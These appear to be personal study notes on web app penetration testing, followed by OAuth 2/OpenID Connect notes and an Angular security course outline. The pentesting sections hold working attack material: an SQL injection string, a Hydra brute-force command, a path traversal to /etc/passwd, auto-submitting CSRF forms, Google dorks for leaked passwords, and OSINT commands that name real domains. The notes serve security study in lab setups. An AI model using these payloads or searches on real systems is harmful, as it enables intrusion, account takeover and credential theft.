Table of Contents generated with DocToc
- Haking Web Apps and Penetration Testing (in short)
- Haking Web Apps and Penetration Testing - Tools & Configs
- Inputs and Outputs testing
- Authentication vulnerabilities testing
- Authorization vulnerabilies testing
- Session management flaws - Session Fixation
- Session management flaws - Cross Site Request Forgery
- Information Gathering Through the Internet
- Securing Angular Apps with OpenID Connect and OAuth 2
- Security Architecture Using Claims
Security Projects - coverded subjects:
- Install Virtual Box and Vagrant. Connect all your Virtual Machines in a NAT network.
- Install Kali.
- Install Foxy Proxy in the browser and use it to rapidly change the Proxy for your browser traffic each time you perform penetration tests
In terminal: Each time you take action to trouble shoot issues (eg. Manually set the IP for your VM) you have to reboot your virtual machine.
ip a # OR:
ifconfig # to see your IP
ping 8.8.8.8 # ping your DNS address
IP Address = Gateway IP
service networking restart
service networking status- choose Proxy 'localhost:8080' in order to route traffic through Burp Suite
- Use Burt Suite - run it by turning on interseption
- Use OWASP ZAP – can use it as apersonal proxy = find vulnerabilities in web app
Chmod 755 ZAP_unix.sh
./ ZAP_unix.sh # install on linux VM- Use BeEF = Browser Explotaition Framework
- Use OWASP's Broken Web Applications located in souceforge.org in oder to install it on your local machines and make penetration testing
-
If the input is not sanitized, an SQL injection can be done sending the input field like:
-
Use SQL Map app (is embeded into Kali Linux), to exploit+test SQL vulnerabilities
1' OR 1=1 -- Which compleates a valid SQL in the database interogation process:
-
A good fix for SQL injection is the use of ORM ( in OO languages). On front-end side Frameworks sanitize form inputs.
-
In the case of brute force attacks, the amount of time to guess the password encresease exponentialy with the length of the password. Advise for personal password: choose long passwords - eg. 40-60 characters - for all your accounts, just have for each account a specific word - different from an account to another.
-
Use HYDRA( embeded in Kali) - Online App Password Cracking Tool:
-
choose Proxy 'localhost:8080' in order to route browser's traffic through Burp Suite
-
make a login attempt and Burp intersepts this loging attenpt. Use Burp's data in order crack the passwords with Hydra:
# as root@kali :
hydra -l admin -P /usr/share/john/password/lst 172.16.99.139 http-post-form "/dvwa/login.php:username=^USER^&password=^^PASS^&Login=Login:Login failed" -f
# where the 'Login failed' is the message from UI interface
# the -f flag denotes that command should exit when it find a valid pair user-pass- One Authorization vulnerability is the path traversal vulnerability ( server level we can change path and have direct access at files from server)
For example, in the URL of the website to hack,you can end the path with: ../../../../../../etc/passwd (for a Linux based OS - for Windows we have ..), where the use of ../ will be as high as needed to rich the root path(if there are too many occurences of ../ there will be no error). Thus you got into the passwords directory. Worst, if we can reach the shadow file, we get access to the file with actual passwords in encrypted format.
Session ID should change after user login, orelse - Session fixation vulnerability can be exploited:
To test this vulnerability, in the OWASP's Broken Web Applications installed on your Kali machine, click OWASP WebGoat link. Authenticate and go to session fixation vulnerability. Send a phising email containig a madeup session id (that you - the attacker will use after the victim has logged in with your made-up session id and it's credentials) inside a legitim URL that points to the trusted app for the user. Follow all steps, guided by the OWOASP WebGoat interface, in order to explore how penetration test is done.
Once again you can test this vulnerability on the OWASP's Broken Web Applications installed on your Kali machine:
- Click the CSRF button and after that copy from page source the change pass form, into a page of yours.
<h3>Just click the button</h3>
<form action="http://owaspbwa.com/dvwa/vulnerabilities/csrf" method="GET"> <!-- explicitly change the action URL of the GET method with the one of the page where the form exists-->
<input type="hidden" name="password_new" value="111"> <!-- hide the pass input for the victim -->
<input type="hidden" name="password_conf" value="111"> <!-- hide the new pass input for the victim -->
<input type="submit" value="Change" name="Change">
</form>While the user is logged in the app (or you, testing this vulnerability), if he clicks Change button in the page that loads this script(the one provided by an attacker who knows the CSFR vulnerability), his password will be changed.
even more, the HTML change with some JavaScript doesn't even require the user to click:
<h3>No need to click - no button</h3>
<form action="http://owaspbwa.com/dvwa/vulnerabilities/csrf" method="GET" name="myForm" id="myForm"> <!-- explicitly change the action URL of the GET method with the one of the page where the form exists-->
<input type="hidden" name="password_new" value="111"> <!-- hide the pass input for the victim -->
<input type="hidden" name="password_conf" value="111"> <!-- hide the new pass input for the victim -->
<input type="hidden" value="Change" name="Change"> <!-- hide the button for the victim, the script will submit the form -->
</form>
<script>
document.forms["myForm"].submit();
</script>inurl:co.uk inurl:admin#use this in Google search in order to find administrator panels in sites that have .co.uk superdomainfiletype:sql hotmail gmail passwordsite:/com:8443intitle:index.of
https://www.exploit-db.com/google-hacking-database
The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening reach of the Google search engine. In the GHDB you'll find search terms for files containing usernames, vulnerable servers, and even files containing passwords.
When the Google hacking database was integrated in the exploit database of offensive security, the various Google talks contained in the thousands of exploit entries, were entered into the GHDB. The direct mapping allows penetration testers to more rapidly determine if a particular web application has a publicly available exploit.
Shodan - crawls Internet https://ics-radar.shodan.io/ and finds all devices connectected to the internet.
Go to: www.shodan.io page. Search example: cisco last-modified country:GB . In the seach result you will get access to CISCO interfaces where you(the attacker) can perform Brute Force Attacks - or even worst (for the victim), get access to a CISCO device manager interface :-|.
pipl.com - gather info that other search engines miss about people. checkusernames.com - searches inside 160 networks for an user name
Web Archives - http://web.archive.org - stores pages that do not exist anymore on publicly available websites. Search for the website you are interested in and you will be provided with links(inside a timetable) to the archived website(that can contain sensitive data, not disclosed any more on the website).
FOCA - Fingerprinting Organization with Collected Archives - a tool used mainly to find metadata and hidden information.
a) You can download all the sources as well as the executable binary from github.com/ElevenPaths/FOCA (requires SQL Express installed on your machine) OR b) use an older version, portable - no installation - from elevenpaths.com's website (in the bottom of the page): Run FOCA.exe from bin dir -> New Project in wich correcty provide the website domain you what to scan and colect documents/metadata from. After scan you will have the result list with documents, see metadata of each document (select documents and download) .
The Harvester ( available at githib.com/laramies/theHarvester and also embeded in Kali Linux) = a tool to gather emails, hosts, ports, etc ... from a domain
theharvester options # see options
theharvester -d etu.edu.tr -l 2000 -b bing # domain etu.edu ..., limit 2000, data source=bing
# when it finishes the search you will see the emails, hosts found as search resultsRecon-NG - embeded in Kali Linux or you can download it from bitbucket.org
Recon-ng is a full-featured Web Based Open Source Reconnaissance framework written in Python. Complete with independent modules,
database interaction, built in convenience functions, interactive help, and command completion.
./recon-ng.py # written in Phyton
recon-ng # run script and you will get a shell like interface
help
show modules # see available modules
use recon/domains-vulnerabilities/xssed
show info # will display info about the recon/domains-vulnerabilities/xssed module
show options # see module's params
set SOURCE www.nhs.uk # set the source in wich to recognize a xssed vulnerability
run # run module = search for vulnerabilitiesMaltega Website: www.paterva.com
maltegoce # run Maltego Community edition embeded
- Choose the machine to run
- specify target domain
- 12 entries of data colected for this domain show in the result page
- select grouped nodes from the graphic results and you will see all the values (eg. emails for those nodes)
https://www.youtube.com/watch?v=ly5dxX5z_ok&list=PLhOe7XHlsIfFXCnP7_4pDGlcyJ5l3GUqY&index=9
Code in dir ./Autentication-Flows-Http\get.http Install REST Client Extention in orger to make GET?POST API request without the need of Postman In VS Code -> View -> Toggle Wordwrapp
This basicaly includes authenticating with IDToken and after that getting the authorization token(accessToken) to auth in B2C. For dev pursoses we use localhost but the RedirectURI should be of https get1.http:
GET https://login.microsoftofline.com/organizations/oauth2/v2.0/authorize?client_id=andHeareIsTheValueFromAzureActiveDirectory..
&response_type=code
&redirect_uri=http://localhost
&response_mode=query
&scope=https://graph.microsoft.com/user.readinstead of /organizations/ can be /common/ or the tenant id that you can find in portal.azure.com -> your registered app config
If we Run GET request in VS Code, will get a 200 OK and the HTML page of the MS sign-in Thus, if you put that curl in browser and you land on MS login page, where if you consent and login you get redirected to the localhost, with a query string like ?code= 0.AAGGGFSGHH....&session_state=hhdgjg-gfgs...):
http://localhost/?code=theCodeThatIReceivedInTheQuesryParamsOfTheRedirectURL&session_state=hhdgjg-gfgs...This code we can use when we go get our token:
POST https://login.microsoftonline.com/organizations/oauth2/v2.0/token
Content-Type: application/x-www-form-urlencoded
client_id=andHeareIsTheValueFromAzureActiveDirectory
&redirect_uri=http://localhost
&scope=https://graph.microsoft.com/user.read
&grant_type=authorization_code
&code=theCodeThatIReceivedInTheQuesryParamsOfTheRedirectURLIf I run this POST I get the Bearer Token that I can further use to access the diferent APIs theBearerTokenthatIcanfurtherusetoaccessdiferentAPIs
In aka.ms/ge it opens https://developer.microsoft.com/en-us/graph/graph-explorer
To get profile photo use: https://graph.microsoft.com/v1.0/me/photo/$value API
GET https://graph.microsoft.com/v1.0/me/photo/$value
Authorization: Bearer theBearerTokenthatIcanfurtherusetoaccessdiferentAPIsOAuth 2.0 Authorization code flow (with PKCE). The authorization code flow allows the application to exchange an authorization code for ID tokens to represent the authenticated user and Access tokens needed to call protected APIs. In addition, it returns Refresh tokens that provide long-term access to resources on behalf of users without requiring interaction with those users. This is the recommended approach.
https://docs.microsoft.com/en-us/azure/active-directory/develop/authentication-flows-app-scenarios
More Secure JavaScript Single-Page Applications with MSAL 2.0 and OAuth 2.0 Auth Code Flow with PKCE
You can follow MS Azure Active Directory docs, videos and posts about configuring your app registrations. You will find details about all the above.
How to authenticate users of your app with MS identity platform
- Security Design Considerations
- Client vs. Server Security
- Angular App Security Architecture
- Authentication and Authorization
- Terminology
- OpenID Connect and OAuth 2 Protocols
- Identity Provider Options
- Client Library Options
- A Tour through the Demo Application
- Choosing OpenID Connect
- Understanding OpenID Connect JWT Tokens
- Choosing Your OpenID Connect Protocol Flow
- Using Authorization Code Flow with PKCE
- A Word About OIDC-client Library
- A Quick Review of the Client Functionality
- Getting the Client Code Running on Your Machine
- Getting the Server-side Code Running on Your Machine
- Adding oidc-client and an Auth Service Component
- Configuring oidc-client to Connect to Your STS
- Adding Login to the App
- Logging into the STS
- Adding the Post-login Callback Page
- Handling Login Status and Logging Out
- Debugging Client Configuration Errors
- Inspecting the JWT Tokens
- A Word About User Registration
- Integrating with Other OIDC Providers
- Configuring Client Apps, APIs, and Users in Auth0
- Changing the Client Configuration to Connect with Auth0
- Resolving Differences in STS Configuration
- Summary
- OAuth 2 Terminology/Roles
- OAuth 2 Grant Types
- Understanding OAuth 2 Tokens
- Requiring Consent
- Requiring Authentication at the API Server
- Passing Access Tokens in API Calls Manually
- Using an Authentication Interceptor to Pass Tokens
- Filtering Data Based on Claims
- Enforcing Access Control Based on Claims
- Handling Authorization Errors in the Client App
- Using Role or Custom Claims for Filtering and Access Control
- Summary
- Revisiting Token Management
- Token Expiration Review
- Enabling Silent Renew of Access Tokens
- Providing a Security Context to the Client
- Managing User Experience Based on the Security Context
- Preventing Unauthorized Access to Views with Route Guards
- Single Sign-on from Another Client App
- Summary
